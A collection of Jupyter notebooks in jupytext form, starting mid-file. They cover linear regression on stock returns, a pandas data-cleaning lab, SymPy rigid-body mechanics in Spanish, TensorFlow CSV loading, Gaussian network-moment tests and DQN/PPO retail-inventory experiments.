regr.fit(dataset_X_train, dataset_y_train)
# The coefficients
print('Coefficients: \n', regr.coef_)
# The mean square error
print("Mean squared error: %.2f"
% np.mean((regr.predict(dataset_X_train) - dataset_y_train) ** 2))
# Explained variance score: 1 is perfect prediction
print('Variance score: %.2f'
% regr.score(dataset_X_train, dataset_y_train))
## Split the targets into test set
dataset_X_test = returns[train_ix:].drop(target, axis=1)
dataset_y_test = returns[train_ix:][target].to_frame()
# The coefficients
print('Coefficients: \n', regr.coef_)
# The mean square error
print("Mean squared error: %.2f"
% np.mean((regr.predict(dataset_X_test) - dataset_y_test) ** 2))
# Explained variance score: 1 is perfect prediction
print('Variance score: %.2f'
% regr.score(dataset_X_test, dataset_y_test))
results = dataset_y_test.copy()  # copy so we don't mutate the test set
results['predicted'] = regr.predict(dataset_X_test)
# Plot outputs
plot_model(results[[target, 'predicted']], 'Linear Regression Model')
# Scatter Plot
fit = np.polyfit(results[target], results['predicted'], deg=1)
results.plot(kind='scatter', x=target, y='predicted')
plt.plot(results[target], fit[0] * results[target] + fit[1], color='red')
plt.show()
# LONG & SHORT simulation based on the prediction
results['long'] = results['predicted'].gt(results['predicted'].shift(1))
results['equity'] = results[target].pct_change()
results.loc[results['long'] != True, 'equity'] = results['equity'] * -1
results['strategy'] = results['equity'].cumsum()
results['stock'] = results[target].pct_change().cumsum()
# Profit Loss Plot
ax = results[['strategy', 'stock']].plot(title='Profit Loss')
fmt = '{x:.2%}' # https://pyformat.info/
yticks = mtick.StrMethodFormatter(fmt) # Use the new-style format string
ax.yaxis.set_major_formatter(yticks)
plt.show()
# -
# TODO List:
# * Compare the 2 strategies: Price & Returns
# * Make a function to automate the ML workflow
# # Thanks for your attention!
# ## Any Questions?
# Notebook style
from IPython.core.display import HTML
css_file = './static/style.css'
HTML(open(css_file, "r").read())
01 - Machine Learning Basics.ipynb
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python (myenv)
# language: python
# name: myenv
# ---
# # Course Name: Visualisation for Data Analytics
# # Objective: Data Pre-Processing
# ### Dataset credit: https://archive.ics.uci.edu/ml/datasets/Breast+Cancer
# #### NOTE: I have modified some parts of the dataset and added missing values in it
# Import Libraries
import pandas as pd
# + [markdown] pycharm={"name": "#%% md\n"}
# # Read the data given in the CSV file provided with the lab
# + pycharm={"name": "#%%\n"}
data = pd.read_csv("breast-cancer.csv")
# + [markdown] pycharm={"name": "#%% md\n"}
# ### Q1. Find the number of null values in the column 'deg'
# + pycharm={"name": "#%%\n"}
missing_deg = data["deg"].isnull().sum()
missing_deg
# -
# ### Q2. Find the rows with null values in the column 'node-caps'
# + pycharm={"name": "#%%\n"}
missing_nodecap = data[data["node-caps"].isnull()]
missing_nodecap
# -
# ### Q3. Compute the percentage of missing values in the column 'deg'. Drop the column if the percentage of missing values is greater than or equal to 75%.
# + pycharm={"name": "#%%\n"}
rows = len(data)  # total rows; .count() would exclude the NaNs themselves
percent = missing_deg / rows * 100
print(f"Percentage Missing = {percent}")
# -
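# The question also asks to drop the column when at least 75% of its values are missing; the cell above only computes the percentage. A hedged sketch of the drop step on a toy frame (column names are illustrative):

```python
import numpy as np
import pandas as pd

df = pd.DataFrame({'mostly_missing': [1.0, np.nan, np.nan, np.nan],
                   'complete': [1, 2, 3, 4]})
threshold = 75
missing_pct = df.isnull().mean() * 100          # per-column percentage of NaNs
df = df.drop(columns=missing_pct[missing_pct >= threshold].index)
```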
# ### Q4. Replace the null values in the 'deg' column with the column mean
# +
data["deg"] = data["deg"].fillna(data["deg"].mean())
data
# -
# ### Q5. Drop rows consisting of null or missing values
# + pycharm={"name": "#%%\n"}
data.dropna(inplace=True)
data
# -
# ### Q6. Find and drop rows consisting of duplicate data?
data.drop_duplicates(inplace=True)
data
# ### Q7 Encode columns consisting of categorical data using 'OrdinalEncoder'
# +
from sklearn import preprocessing
# -
enc = preprocessing.OrdinalEncoder()
enc.fit(data)
print(enc)
# + pycharm={"name": "#%%\n"}
enc.fit_transform(data)
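# On a tiny hand-made column the mapping is easy to see: `OrdinalEncoder` sorts the categories and replaces each one by its index. A sketch independent of the lab's dataset (values are illustrative):

```python
import numpy as np
from sklearn.preprocessing import OrdinalEncoder

X = np.array([['low'], ['high'], ['medium'], ['low']])
encoder = OrdinalEncoder()
codes = encoder.fit_transform(X)
# Categories are sorted alphabetically: ['high', 'low', 'medium'],
# so 'high' -> 0, 'low' -> 1, 'medium' -> 2.
```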
# + pycharm={"name": "#%%\n"}
06-data-pre-processing-questions.ipynb
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# <img src="../images/aeropython_logo.png" alt="AeroPython" style="width: 300px;"/>
# # Mechanics with SymPy
# _If SymPy has seemed like a decent and even interesting CAS so far (nothing beats having the results rendered in $\LaTeX$ inside the notebook, with Python syntax for symbolic computation), just wait until you see the `mechanics` package. With it, we can manipulate velocities and accelerations of rigid bodies expressed in different reference frames with remarkable ease._
#
# _The `mechanics` documentation is available at http://docs.sympy.org/0.7.5/modules/physics/mechanics/index.html._
# ## Reference frames
# The central objects we are going to handle are reference frames. We can define geometric relations between them, and transforming vectors from one frame to another then becomes trivial.
# The usual way to start working with SymPy is to import the `init_session` function:
# ```
# from sympy import init_session
# init_session(use_latex=True)```
#
# This function takes care of importing all the basic functions and setting up the graphical output. However, at the moment it is under maintenance for use inside notebooks, so we will enable the graphical output and import the functions the usual way. You can check the status of the fix at: https://github.com/sympy/sympy/pull/13300 and https://github.com/sympy/sympy/issues/13319 .
# Everything we need lives in `sympy.physics.mechanics`, including the `ReferenceFrame` class. As soon as we create a reference frame we can access its unit vectors: `x`, `y` and `z`.
#
# http://docs.sympy.org/0.7.5/modules/physics/vector/vectors.html
# And to define vectors we just have to **multiply each component by its unit vector**:
# From now on, to work as we would on a classroom problem, we are going to do two things:
#
# * Define an inertial frame $1$ to start from, so that every other frame can be referred to it.
# * Call the unit vectors of that frame $i, j, k$.
# And to avoid having to do this every time, a little magic trick:
# We define our own class so that the unit vectors are IJK
# aeropython: preserve
class IJKReferenceFrame(ReferenceFrame):
def __init__(self, name):
        super().__init__(name, latexs=[r'\mathbf{%s}_{%s}' % (idx, name) for idx in ("i", "j", "k")])
self.i = self.x
self.j = self.y
self.k = self.z
# ### Vector algebra
# Our vectors also work with symbols, and we can compute dot and cross products with them.
# We can also find the norm of a vector with its `magnitude` method, and even normalize it with `normalize`:
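# A minimal sketch of these operations (the symbol names are ours, chosen for illustration):

```python
from sympy import symbols, sqrt
from sympy.physics.vector import ReferenceFrame, cross, dot

A = ReferenceFrame('A')
a, b = symbols('a b', positive=True)
v = a * A.x + b * A.y

assert dot(v, A.z) == 0          # v lies in the x-y plane
assert cross(A.x, A.y) == A.z    # right-handed unit vectors
assert v.magnitude() == sqrt(a**2 + b**2)
```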
# ##### Exercise
#
# Using the formula for the derivative in moving axes directly:
#
# $$\left(\frac{\operatorname{d}\!\mathbf{a}}{\operatorname{d}\!t}\right)_1 = \left(\frac{\operatorname{d}\!\mathbf{a}}{\operatorname{d}\!t}\right)_0 + \mathbf{\omega}_{01}\! \times \mathbf{a}$$
#
# Compute the derivative of the position vector $R \mathbf{i}_0$, where $A_0$ is a reference frame that rotates with respect to the inertial one with angular velocity $\mathbf{\omega}_{01}=\Omega \mathbf{k}_0$. **What is the magnitude of the derivative?**
# <div class="alert alert-warning">If you did not specify `positive=True` you will see something like $\sqrt{\Omega^2 R^2}$. There should be a way to simplify this expression _a posteriori_, but for now it does not quite work. We noticed this while preparing this notebook and have already let them know :) https://github.com/sympy/sympy/issues/8326
# </div>
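# One possible solution sketch (the frame and symbol names are ours, not fixed by the exercise):

```python
from sympy import simplify, symbols
from sympy.physics.vector import ReferenceFrame

Omega, R = symbols('Omega R', positive=True)
A1 = ReferenceFrame('A1')          # inertial frame
A0 = ReferenceFrame('A0')          # rotating frame
A0.set_ang_vel(A1, Omega * A0.z)   # omega_01 = Omega k_0

r = R * A0.x
dr = r.dt(A1)   # applies (dr/dt)_1 = (dr/dt)_0 + omega_01 x r
# dr comes out as Omega*R*A0.y, so its magnitude is Omega*R
```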
# ### Relative motion
# Who doesn't love multiplying rotation matrices? For the minority who hate it, there is SymPy. We must specify the orientation of our reference frames using the `orient` method, and we recover the direction cosine matrix using the `dcm` method.
# Using the `Axis` argument we specified a rotation of the frame by a given angle about a given axis. Other methods are:
#
# * `Body`: the three Euler angles are specified.
# * `Space`: like `Body`, but the rotations are applied in reverse order.
# * `Quaternion`: using quaternions, a rotation about a unit vector $\lambda$ by an amount $\theta$.
# <div class="alert alert-success">What is the advantage of using one of these methods? The transformation is **always** well defined! It is impossible to sneak in a rotation matrix that is incorrect or nonsensical.</div>
# #### A different reference frame
#
# To express a vector in another reference frame, we just use the `express` or `to_matrix` methods:
# #### Dynamic symbols
#
# If we want to specify that a symbol can vary with time, we must use the `dynamicsymbols` function:
# And ask for its derivative with the `diff` method:
# ##### Exercise
#
# 
#
# (From Cuerva et al., "Teoría de los Helicópteros")
#
# **Obtain the rotation matrix of blade $B$ with respect to the $A1$ axes.**
# #### Angular velocity
#
# We can also find the angular velocity of one frame with respect to another using the `ang_vel_in` method:
# Occasionally the graphical output may fail, but it can be toggled off and on again by calling `init_printing(pretty_print=True)` with different values (True/False) for `pretty_print`.
# ### Derivative in moving axes
#
# Anyone can take a derivative with the formula, but SymPy can take care of it automatically.
# +
#v1.diff(dynamicsymbols._t, A2)
# -
# ### Points, velocities, and the wheel that rolls without slipping
# The last step needed to complete the kinematics is the ability to define points on rigid bodies and apply the velocity field. SymPy allows this too; we just have to import the `Point` class.
# To work as we would at school, we will specify that $O$ is the origin of $A$, and to do so we will impose that its velocity is zero with the `set_vel` method:
# To define new points, we can use the `locatenew` method:
# And to obtain vectors from one point to another, the `pos_from` method:
# <div class="alert alert-info">The notation of this package is influenced by the book Kane, <NAME>. & <NAME>. "Dynamics, Theory and Applications". It is slightly different from what we studied at school, but they are open to any kind of suggestion we make! https://github.com/sympy/sympy/issues/2584#issuecomment-31552654</div>
# Finally, the **velocity field of a rigid body** is formulated using the `v2pt_theory` method.
#
# $$v^P_A = v^O_A + \omega_{A_1 A} \times \mathbf{OP}$$
#
# This method belongs *to the point whose velocity we want to know* and takes three parameters:
#
# * `O`, a point with known velocity in A
# * `A`, the reference frame in which we want to compute the velocity
# * `A1`, the reference frame in which both points are fixed (the _carrying frame_)
#
# Therefore, to find the velocity of the point we have just created:
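# A minimal sketch of the call (our own frames and names, not the notebook's exercise): a point $P$ fixed in a frame $A$ that rotates about $N$'s $z$ axis.

```python
from sympy import simplify
from sympy.physics.mechanics import Point, ReferenceFrame, dynamicsymbols

theta = dynamicsymbols('theta')
N = ReferenceFrame('N')                      # frame where we want the velocity
A = N.orientnew('A', 'Axis', [theta, N.z])   # carrying frame
O = Point('O')
O.set_vel(N, 0)                              # O has known (zero) velocity in N
P = O.locatenew('P', 2 * A.x)                # P is fixed in A

v = P.v2pt_theory(O, N, A)   # v_P = v_O + omega_{A/N} x OP
```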
# ##### Exercise
#
# 
#
# (Lecture notes by <NAME>)
#
# **Find the velocity and the acceleration of $P$!**
# +
# We create our reference frames
# +
# We create the necessary dynamic symbols
# +
# We orient the reference frames
# -
# +
# We create the point C, the center of the disk, and specify its velocity
# with respect to A1
# +
# We locate the point P, a fixed point of the disk, with respect to C, in
# the frame A2 (which rotates together with the disk)
# +
# We find the velocity of P in A1, expressed in A0
# This call alone already states that C and P are fixed in A2!
# -
# **Mission accomplished :)**
# ---
# _We have made a fairly thorough review of the possibilities of SymPy's `mechanics` package. We have left a few things out, but not many: this functionality is still expanding and needs some polishing._
#
# **References**
#
# * **Aeromechanics** chapter of the book by Cuerva et al. http://nbviewer.ipython.org/gist/Juanlu001/7711865
# * Longitudinal stability of a Boeing 747 http://nbviewer.ipython.org/github/AlexS12/Mecanica_Vuelo/blob/master/MVII_MatrizSistema.ipynb
#
# _Will you be the next one to publish a notebook using SymPy? ;)_
# ##### <a rel="license" href="http://creativecommons.org/licenses/by/4.0/deed.es"><img alt="Licencia Creative Commons" style="border-width:0" src="http://i.creativecommons.org/l/by/4.0/88x31.png" /></a><br /><span xmlns:dct="http://purl.org/dc/terms/" property="dct:title">Curso AeroPython</span> by <span xmlns:cc="http://creativecommons.org/ns#" property="cc:attributionName"><NAME> and <NAME></span> is licensed under a <a rel="license" href="http://creativecommons.org/licenses/by/4.0/deed.es">Creative Commons Attribution 4.0 International License</a>.
# ---
# _The following cells contain the notebook configuration_
#
# _To display and use the Twitter links, the notebook must be run as [trusted](http://ipython.org/ipython-doc/dev/notebook/security.html)_
#
# File > Trusted Notebook
# This cell sets the notebook style
from IPython.core.display import HTML
css_file = '../styles/aeropython.css'
HTML(open(css_file, "r").read())
notebooks_vacios/041-SymPy-Mecanica.ipynb
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
import tensorflow as tf
def train_decode_line(row):
cols = tf.io.decode_csv(row, record_defaults=[[0.], ['house'], [0.]])
myfeatures = {'sq_footage':cols[0], 'type':cols[1]}
mylabel = cols[2] #price
return myfeatures, mylabel
def predict_decode_line(row):
    cols = tf.io.decode_csv(row, record_defaults=[[0.], ['house']])
myfeatures = {'sq_footage':cols[0], 'type':cols[1]}
return myfeatures
line_dataset = tf.data.TextLineDataset('./curated_data/train.csv')
line_dataset
for line in line_dataset.take(4):
print(line)
train_dataset = line_dataset.map(train_decode_line)
for train in train_dataset.take(4):
print(train)
Chapter03/datasets/create_dataset_from_text.ipynb
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python [default]
# language: python
# name: python3
# ---
# ## Gaussian Network Moments (GNMs)
#
# Let $\mathbf{x}\sim\mathcal{N}\left(\mathbf{\mu}, \mathbf{\Sigma}\right)$ and $q(x) = \max(x, 0)$ where $\Phi(x)$ and $\varphi(x)$ are the CDF and PDF of the normal distribution,
#
# $\mathbb{E}\left[q(\mathbf{x})\right] = \mathbf{\mu}\odot\Phi\left(\mathbf{\mu}\oslash\mathbf{\sigma}\right) + \mathbf{\sigma}\odot\varphi\left(\mathbf{\mu}\oslash\mathbf{\sigma}\right)$
# where $\mathbf{\sigma} = \sqrt{\text{diag}\left(\mathbf{\Sigma}\right)}$ with
# $\odot$ and $\oslash$ as element-wise product and division.
#
# $\mathbb{E}\left[q^2(\mathbf{x})\right] =
# \left(\mathbf{\mu}^2+\mathbf{\sigma}^2\right) \odot \Phi\left(\mathbf{\mu}\oslash\mathbf{\sigma}\right) + \mathbf{\mu} \odot \mathbf{\sigma} \odot \varphi\left(\mathbf{\mu}\oslash\mathbf{\sigma}\right)$
# where $\text{var}\left[q(\mathbf{x})\right] = \mathbb{E}\left[q^2(\mathbf{x})\right] - \mathbb{E}\left[q(\mathbf{x})\right]^2$
#
# $\left.\mathbb{E}\left[q(\mathbf{x})q(\mathbf{x})^\top\right]\right|_{\mathbf{\mu} = \mathbf{0}} = c\left(\mathbf{\Sigma}\oslash\mathbf{\sigma}\mathbf{\sigma}^\top\right) \odot \mathbf{\sigma}\mathbf{\sigma}^\top$
# where $c(x) = \frac{1}{2\pi}\left(x\cos^{-1}(-x)+\sqrt{1-x^2}\right)$
# (Note: $\left|c(x) - \Phi(x - 1)\right| < 0.0241$)
#
# $\text{cov}\left[q(\mathbf{x})\right] = \mathbb{E}\left[q(\mathbf{x})q(\mathbf{x})^\top\right] - \mathbb{E}\left[q(\mathbf{x})\right]\mathbb{E}\left[q(\mathbf{x})\right]^\top$
# where $\left.\text{cov}\left[q(\mathbf{x})\right]\right|_{\mathbf{\mu} = \mathbf{0}} = \left.\mathbb{E}\left[q(\mathbf{x})q(\mathbf{x})^\top\right]\right|_{\mathbf{\mu} = \mathbf{0}} - \frac{1}{2\pi}\mathbf{\sigma}\mathbf{\sigma}^\top$
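# A quick numerical sanity check of the first moment expression in the scalar case (the values of $\mu$ and $\sigma$ below are arbitrary):

```python
import numpy as np
from math import erf, exp, pi, sqrt

mu, sigma = 0.7, 1.3
Phi = lambda z: 0.5 * (1.0 + erf(z / sqrt(2.0)))    # standard normal CDF
phi = lambda z: exp(-z * z / 2.0) / sqrt(2.0 * pi)  # standard normal PDF

# E[max(x, 0)] = mu * Phi(mu/sigma) + sigma * phi(mu/sigma)
analytic = mu * Phi(mu / sigma) + sigma * phi(mu / sigma)

rng = np.random.default_rng(0)
mc = np.maximum(rng.normal(mu, sigma, 1_000_000), 0.0).mean()
# mc and analytic agree to roughly three decimal places
```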
# +
import sys
import torch
import unittest
from torch import nn
from pprint import pprint
from types import ModuleType
import network_moments.torch as nm
seed = 77  # for reproducibility
def traverse(obj, exclude=[]):
data = []
if type(obj) is not ModuleType:
return data
for e in dir(obj):
if not e.startswith('_') and all(e != s for s in exclude):
sub = traverse(obj.__dict__[e], exclude)
data.append(e if len(sub) == 0 else {e:sub})
return data
print(nm.__doc__)
print('Network Moments Structure:')
pprint(traverse(nm.gaussian, exclude=['tests', 'general']))
# -
# ### Testing the tightness of the expressions using the built-in unit tests
runner = unittest.TextTestRunner(sys.stdout, verbosity=2)
load = unittest.TestLoader().loadTestsFromModule
result = runner.run(unittest.TestSuite([
load(nm.gaussian.affine.tests),
load(nm.gaussian.relu.tests),
]))
# ### Testing the tightness of the expressions on affine-ReLU-affine networks
rand = nm.utils.rand
gnm = nm.gaussian.affine_relu_affine
print(gnm.special_variance.__doc__)
# +
length = 3
count = 1000000
dtype = torch.float64
device = torch.device('cpu', 0)
torch.manual_seed(seed)
# input mean and covariance
mu = torch.randn(length, dtype=dtype, device=device)
cov = rand.definite(length, dtype=dtype, device=device,
positive=True, semi=False, norm=1.0)
# variables
A = torch.randn(length, length, dtype=dtype, device=device)
c1 = -A.matmul(mu) # torch.randn(length, dtype=dtype)
B = torch.randn(length, length, dtype=dtype, device=device)
c2 = torch.randn(length, dtype=dtype, device=device)
# analytical output mean and variance
out_mu = gnm.mean(mu, cov, A, c1, B, c2)
out_var = gnm.special_variance(cov, A, B)
# Monte-Carlo estimation of the output mean and variance
normal = torch.distributions.MultivariateNormal(mu, cov)
samples = normal.sample((count,))
out_samples = samples.matmul(A.t()) + c1
out_samples = torch.max(out_samples, torch.zeros([], dtype=dtype, device=device))
out_samples = out_samples.matmul(B.t()) + c2
mc_mu = torch.mean(out_samples, dim=0)
mc_var = torch.var(out_samples, dim=0)
# printing the ratios
print('Monte-Carlo mean / Analytical mean:')
print((mc_mu / out_mu).cpu().numpy())
print('Monte-Carlo variance / Analytical variance:')
print((mc_var / out_var).cpu().numpy())
# -
# ### Linearization
# +
batch = 1
num_classes = 10
image_size = (28, 28)
dtype = torch.float64
device = torch.device('cpu', 0)
size = torch.prod(torch.tensor(image_size)).item()
x = torch.rand(batch, *image_size, dtype=dtype, device=device)
model = nn.Sequential(
nm.utils.flatten,
nn.Linear(size, num_classes),
)
model.type(dtype)
if device.type != 'cpu':
model.cuda(device.index)
jac, bias = nm.utils.linearize(model, x)
A = list(model.children())[1].weight
print('Tightness of A (best is zero): {}'.format(
torch.max(torch.abs(jac - A)).item()))
b = list(model.children())[1].bias
print('Tightness of b (best is zero): {}'.format(
torch.max(torch.abs(bias - b)).item()))
# -
# ### Two-stage linearization
# +
count = 10000
num_classes = 10
image_size = (28, 28)
dtype = torch.float64
device = torch.device('cpu', 0)
gnm = nm.gaussian.affine_relu_affine
size = torch.prod(torch.tensor(image_size)).item()
x = torch.rand(1, *image_size, dtype=dtype, device=device)
# deep model
first_part = nn.Sequential(
nm.utils.flatten,
nn.Linear(size, 500),
nn.ReLU(),
nn.Linear(500, 500),
nn.ReLU(),
nn.Linear(500, 300),
)
first_part.type(dtype)
relu = nn.Sequential(
nn.ReLU(),
)
relu.type(dtype)
second_part = nn.Sequential(
nn.Linear(300, 100),
nn.ReLU(),
nn.Linear(100, num_classes),
)
second_part.type(dtype)
if device.type != 'cpu':
first_part.cuda(device.index)
relu.cuda(device.index)
second_part.cuda(device.index)
def model(x):
return second_part(relu(first_part(x)))
# variables
A, c1 = nm.utils.linearize(first_part, x)
B, c2 = nm.utils.linearize(second_part, relu(first_part(x)).detach())
x.requires_grad_(False)
A.squeeze_()
c1.squeeze_()
B.squeeze_()
c2.squeeze_()
# analytical output mean and variance
mean = x.view(-1)
covariance = rand.definite(size, norm=0.1, dtype=dtype, device=device)
out_mu = gnm.mean(mean, covariance, A, c1, B, c2)
out_var = gnm.special_variance(covariance, A, B)
# Monte-Carlo estimation of the output mean and variance
normal = torch.distributions.MultivariateNormal(mean, covariance)
samples = normal.sample((count,))
out_samples = model(samples.view(-1, *image_size)).detach()
mc_mu = torch.mean(out_samples, dim=0)
mc_var = torch.var(out_samples, dim=0)
# printing the ratios
print('Monte-Carlo mean / Analytical mean:')
print((mc_mu / out_mu).cpu().numpy())
print('Monte-Carlo variance / Analytical variance:')
print((mc_var / out_var).cpu().numpy())
static/tightness.ipynb
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# ---
# # Experiments
#
# Here, we compare standard baselines to imitation learning and RL-based methods. Please read the readme first.
# +
# First, we import our libraries and define the neural net model used for DQN.
# We specify the store hyperparameters, then build the training function for our agent.
import torch.nn as nn
import torch
from retail import retail
import torch.distributions as d
import torch.nn.functional as F
import numpy as np
bucket_customers = torch.tensor([800.,400.,500.,900.])
from rlpyt.algos.dqn.dqn import DQN
from rlpyt.agents.pg.categorical import CategoricalPgAgent
from rlpyt.agents.dqn.dqn_agent import DqnAgent
from rlpyt.samplers.serial.sampler import SerialSampler
from rlpyt.runners.minibatch_rl import MinibatchRlEval
from rlpyt.utils.logging.context import logger_context
from rlpyt.samplers.parallel.cpu.sampler import CpuSampler
from rlpyt.algos.pg.ppo import PPO
from rlpyt.agents.pg.gaussian import GaussianPgAgent
torch.set_default_tensor_type(torch.FloatTensor)
class DQNModel(torch.nn.Module):
def __init__(
self,
input_size,
conv_size,
hidden_sizes,
n_kernels,
output_size=None,
nonlinearity=torch.nn.SELU,
):
super().__init__()
self._conv_size = conv_size
self._char_size = input_size-conv_size
self.normL = torch.nn.LayerNorm(input_size)
self._transf_in_size = input_size-conv_size+n_kernels
self.activ = nn.SELU()
if isinstance(hidden_sizes, int):
hidden_sizes = [hidden_sizes]
hidden_layers = [torch.nn.Linear(n_in, n_out) for n_in, n_out in
zip([self._transf_in_size] + hidden_sizes[:-1], hidden_sizes)]
sequence = list()
for layer in hidden_layers:
sequence.extend([layer, nonlinearity(), torch.nn.LayerNorm(layer.out_features)])
if output_size is not None:
last_size = hidden_sizes[-1] if hidden_sizes else input_size
sequence.append(torch.nn.Linear(last_size, output_size))
self.convs = torch.nn.Conv1d(1, out_channels = n_kernels, kernel_size = 1)
self.model = torch.nn.Sequential(*sequence)
self._output_size = (hidden_sizes[-1] if output_size is None
else output_size)
def forward(self, o, action, reward):
oprime = self.normL(o)
stock, characteristics = o.split([self._conv_size,self._char_size],-1)
stock_summary = self.convs(stock.view(-1,1,self._conv_size)).mean(2)
if len(characteristics.shape)>2:
stock_summary.unsqueeze_(1)
summarized_input = torch.cat((self.activ(stock_summary), characteristics),-1)
out = self.model(summarized_input)
return out
@property
def output_size(self):
return self._output_size
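In `DQNModel` above, the stock vector is summarized by a `Conv1d` with `kernel_size=1` followed by a mean over positions. A 1x1 convolution with a single input channel is just a per-position linear map, so the summary it computes can be sketched in plain NumPy (toy sizes and random weights, purely illustrative):

```python
import numpy as np

rng = np.random.default_rng(0)
batch, length, n_kernels = 8, 16, 5

# Conv1d(1, n_kernels, kernel_size=1) parameters: one weight and one bias
# per output channel, applied identically at every stock position.
w = rng.standard_normal((n_kernels, 1))  # shape (out_channels, in_channels)
b = rng.standard_normal(n_kernels)

stock = rng.standard_normal((batch, length))
# Embed each scalar stock level into n_kernels features, then mean-pool
# over positions, as DQNModel.forward does with self.convs(...).mean(2).
embedded = stock[:, None, :] * w[:, 0][None, :, None] + b[None, :, None]
summary = embedded.mean(axis=2)
print(summary.shape)  # (8, 5)
```

Because the same map is applied at every position before pooling, the summary is permutation-invariant in the stock positions, which keeps the input size to the dense layers fixed regardless of the assortment length.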
kwargsStore= {'assortment_size': 1, 'utility_weights' :{'alpha': 1., 'beta': 1., 'gamma': 1.},
'max_stock': 1000, 'forecastVariance' :0.000, 'horizon': 730, 'lead_time': 1}
kwargsModel = {'input_size': 1006, 'hidden_sizes': [100,200, 500, 1000], 'conv_size': 1000, 'n_kernels': 50}
def build_and_train(run_ID=1, cuda_idx=None, env_kwargs = None, mid_batch_reset = False,
n_parallel = 1, model_kwargs=None, initial_model_state_dict = None):
affinity = dict(workers_cpus=list(range(n_parallel)))
sampler = CpuSampler(
EnvCls= retail.StoreEnv,
env_kwargs = env_kwargs,
eval_env_kwargs = env_kwargs,
batch_T=20,
batch_B=2,
max_decorrelation_steps=10,
eval_n_envs=1,
eval_max_steps=int(20e4),
eval_max_trajectories=24
)
algo = DQN(learning_rate=5e-5,discount=.99, replay_ratio=8, batch_size = 16)
agent = DqnAgent(ModelCls=DQNModel, model_kwargs=model_kwargs)
runner = MinibatchRlEval(
algo=algo,
agent=agent,
sampler=sampler,
n_steps=10e4,
log_interval_steps=1e3,
affinity=affinity )
name = "dqn"
log_dir = "experiments"
config = None
runner.train()
dic = agent.state_dict()
torch.save(dic,'dqn-lt1.pt')
# +
#Next, we simply train our DQN agent.
build_and_train(
run_ID=10,
env_kwargs = kwargsStore,
model_kwargs = kwargsModel)
# +
# We define the network for PPO, then its parameters and training function
class NewPPO(torch.nn.Module):
def __init__(
self,
input_size,
conv_size,
hidden_sizes,
n_kernels,
output_size=None,
nonlinearity=torch.nn.SELU,
):
super().__init__()
self._conv_size = conv_size
self._char_size = input_size-conv_size
self.normL = torch.nn.LayerNorm(input_size)
self._transf_in_size = input_size-conv_size+n_kernels
self.activ = nn.SELU()
if isinstance(hidden_sizes, int):
hidden_sizes = [hidden_sizes]
hidden_layers = [torch.nn.Linear(n_in, n_out) for n_in, n_out in
zip([self._transf_in_size] + hidden_sizes[:-1], hidden_sizes)]
sequence = list()
for layer in hidden_layers:
sequence.extend([layer, nonlinearity(), torch.nn.LayerNorm(layer.out_features)])
if output_size is not None:
last_size = hidden_sizes[-1] if hidden_sizes else input_size
sequence.append(torch.nn.Linear(last_size, output_size))
self.convs = torch.nn.Conv1d(1, out_channels = n_kernels, kernel_size = 1)
self.model = torch.nn.Sequential(*sequence)
self._output_size = (hidden_sizes[-1] if output_size is None
else output_size)
def forward(self, o, action, reward):
oprime = self.normL(o)
stock, characteristics = o.split([self._conv_size,self._char_size],-1)
stock_summary = self.convs(stock.view(-1,1,self._conv_size)).mean(2)
if len(characteristics.shape)>2:
stock_summary.unsqueeze_(1)
summarized_input = torch.cat((self.activ(stock_summary), characteristics),-1)
out = self.model(summarized_input).squeeze()
return out.split(1, dim = -1)
@property
def output_size(self):
return self._output_size
kwargsStore= {'assortment_size': 1, 'symmetric_action_space': True,
'max_stock': 1000, 'forecastVariance' :0.000, 'horizon': 730, 'lead_time': 1}
kwargsModel = {'input_size': 1006, 'hidden_sizes': [100,200,100],
'output_size': 3, 'conv_size': 1000, 'n_kernels': 50}
def build_and_train(run_ID=1, cuda_idx=None, env_kwargs = None,
mid_batch_reset = False, n_parallel = 1,model_kwargs=None):
affinity = dict(workers_cpus=list(range(n_parallel)))
sampler = CpuSampler(
EnvCls= retail.StoreEnv,
env_kwargs = env_kwargs,
eval_env_kwargs = env_kwargs,
batch_T=20,
batch_B=1,
max_decorrelation_steps=20,
eval_n_envs=100,
eval_max_steps=int(10e4),
eval_max_trajectories=20)
algo = PPO(learning_rate = 1e-5, discount=.99, value_loss_coeff=.2,
normalize_advantage = True, ratio_clip = .5)
agent = GaussianPgAgent(ModelCls=NewPPO, model_kwargs=kwargsModel)
runner = MinibatchRlEval(
algo=algo,
agent=agent,
sampler=sampler,
n_steps=1e5,
log_interval_steps=1e3,
affinity=affinity
)
name = "pg"
log_dir = "experiments"
config = None
runner.train()
dic = agent.state_dict()
torch.save(dic,'ijcai_genplan-ppo-lt1.pt')
# -
# We then train our PPO-based agent
build_and_train(
run_ID=11,
env_kwargs = kwargsStore,
model_kwargs = kwargsModel)
# We collect results for the forecast-based policy
rewards_forecast_order = []
for i in range(100):
ra = []
done = False
kwargsStore= {'assortment_size': 250, 'lead_time': 1,
'max_stock': 1000, 'seed': i, 'forecastVariance' :0.000, 'horizon': 500}
store = retail.StoreEnv(**kwargsStore)
while not (done):
customers = bucket_customers.sum()
p = store.forecast.squeeze()
std = torch.sqrt(customers*p+(1-p))
order = F.relu(3*std+store.forecast.squeeze()*customers-store.get_full_inventory_position()).round()
obs = store.step(order.numpy())
ra.append(obs[1])
done = obs[2]
rewards_forecast_order.append(torch.stack(ra).mean())
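The loop above implements a forecast-driven base-stock rule: order up to the expected demand plus three times the std term, minus the current inventory position, clipped at zero. A minimal NumPy sketch with made-up numbers (the std expression mirrors the cell above; the values are not the environment's):

```python
import numpy as np

customers = 2600.0                        # bucket_customers.sum()
p = np.array([0.05, 0.20, 0.01])          # per-item purchase probabilities
inventory_position = np.array([60.0, 700.0, 10.0])

mean_demand = customers * p
std = np.sqrt(customers * p + (1 - p))    # std term as written in the cell above
order = np.maximum(3 * std + mean_demand - inventory_position, 0).round()
print(order)  # [104.   0.  32.]
```

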